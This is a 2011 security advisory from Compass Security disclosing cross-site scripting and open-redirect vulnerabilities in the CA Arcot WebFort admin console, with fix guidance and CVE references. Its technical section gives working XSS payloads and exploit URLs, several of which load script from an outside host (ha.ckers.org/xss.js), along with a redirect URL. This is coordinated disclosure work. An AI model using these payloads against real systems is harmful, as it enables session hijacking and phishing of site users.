#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product:  CA Arcot WebFort Versatile Authentication Server (VAS) [1]
# Vendor:   CA Technologies
# Subject:  Multiple Cross-site scripting (XSS) Vulnerabilities
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Daniel Stirnimann <daniel.stirnimann@csnc.ch>
# Date:     04/27/2011
#
#############################################################

Introduction:
-------------
Arcot provides strong authentication via Soft PKI-based soft tokens
called ArcotID. ArcotIDs must connect to Arcot WebFort authentication
server to validate PIN.

System configurations, user and ArcotID management is done over the
Arcot Admin Console a web based Java application. The Arcot Admin
Console is part of the Arcot WebFort Versatile Authentication Server
(VAS).

The Arcot Admin Console lacks proper input validation and output
encoding. As a result, multiple Cross-Site scripting (XSS) [2]
vulnerabilities exist which can be exploited both anonymously and as
an authenticated user. In addition, the login page is also vulnerable
against URL Redirection [3] attacks.


Affected:
---------
Vulnerable:
 CA Arcot WebFort Versatile Authentication Server (VAS) prior to 6.2.5

 
Solution:
---------
Upgrade to CA Arcot WebFort Versatile Authentication Server (VAS) 6.2.5


Vendor Vulnerability Report:
----------------------------
CA20110426-01: Security Notice for CA Arcot WebFort Versatile Authentication Server https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={A71F5839-D214-4719-B918-4476E4537998}

 
Technical Description
---------------------

XSS on Forgot Password Page

If the entered user on the User Name input field does not exist in the
system an error message is shown in which the entered string is
returned.
URL: https://192.168.100.10/arcotadmin/wfupForgotPassword.htm

Sample Input:
<SCRIPT SRC=HTTP://HA.CKERS.ORG/XSS.JS></SCRIPT> 

Server Response (HTML excerpt):
<span class="errorMessage"> 
The credential was not found for the user 
( <SCRIPT SRC=HTTP://HA.CKERS.ORG/XSS.JS></SCRIPT> ).
</span>


XSS and Redirection Attack on Arcot Admin Login Page

The successRedirectUrl parameter is used in the login form. The
argument value is not encoded in the HTML form. Exploit URL for XSS:
https://192.168.100.10/arcotadmin/wfUPlogin.htm?successRedirectUrl="><script src=http://ha.ckers.org/xss.js><c="

In addition, the successRedirectUrl parameter is vulnerable against
redirection attacks.
https://192.168.100.10/arcotadmin/mabamlogin.htm?successRedirectUrl=http://www.example.com?MODULENAME=BASIC_AUTH
After login the user is redirected to www.example.com


XSS on Report View Page

The reportPrivId name is returned on the page. The argument value is
not encoded on the HTML page. Note, the report page can only be viewed
as an authenticated user.
Exploit URL:
https://192.168.100.10/arcotadmin/Wf_Authreport/view.htm?TOPLEVELID=Reports&SECLEVELID=Wf_UserReports&reportPrivId=WF.ViewAnyReport"><script src=http://ha.ckers.org/xss.js><c="


XSS on Change My Profile Page

On the update profile page the user can enter "Configuration Questions
and Answers".
URL: https://192.168.100.10/arcotadmin/Ac_AdminProfile/updateProfile.htm

Dangerous characters in the question input field are not output encoded
on the update profile page. Note, the entered string is persistent. As
a result, a malicious script tag is executed each time the user visits
the update profile page.

Sample Question Input:
"><script>alert(123)</script><c="


XSS on Change Attribute Settings

On the page "Users and Administrators -> Search Users and Administrators"
when viewing the details of a found user and clicking on the
"Manage Credentials" tab, the user can define "Custom Attributes" for
the selected authentication schema.

The application does not encode dangerous characters entered as user
input in the response. As a result, html tags can be embedded. However,
the application rejects some strings such as "script", "onmouseover"
or "onfocus" which prevents simple javascript attack vectors.



Proposed Fix:
-------------
Encoding of dangerous characters in the output according to the
encoding rules of the respective type of context (HTML body,
argument, JS string, generated URLs). For normal HTML body
content, use the following HTML entities:
<  ->  &lt;
>  ->  &gt;
"  ->  &quot; 
'  ->  &apos;
&  ->  &amp;



Timeline:
---------
2011-04-27:     Coordinated public disclosure date
2011-04-26:     Release of fixed Version / Patch
2011-01-27:     Initial vendor response
2011-01-27:     Initial vendor notification
2011-01-18:     Discovery by Daniel Stirnimann


References:
-----------

CVE-2011-1825 - WebFort XSS
CVE-2011-1826 - WebFort Redirect

[1] http://www.arcot.com/products/webfort/

[2] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Cross-Site Scripting attacks are a type of injection problem, in which 
malicious scripts are injected into the otherwise benign and trusted web
sites. Cross-site scripting (XSS) attacks occur when an attacker uses a
web application to send malicious code, generally in the form of a browser
side script, to a different end user. Flaws that allow these attacks to
succeed are quite widespread and occur anywhere a web application uses
input from a user in the output it generates without validating or
encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting
user. The end user’s browser has no way to know that the script should not
be trusted, and will execute the script. Because it thinks the script came
from a trusted source, the malicious script can access any cookies,
session tokens, or other sensitive information retained by your browser
and used with that site. These scripts can even rewrite the content of the
HTML page. 

[3] http://www.owasp.org/index.php/Open_redirect

An open redirect is an application that takes a parameter and redirects a
user to the parameter value without any validation. This vulnerability is
used in phishing attacks to get users to visit malicious sites without
realizing it.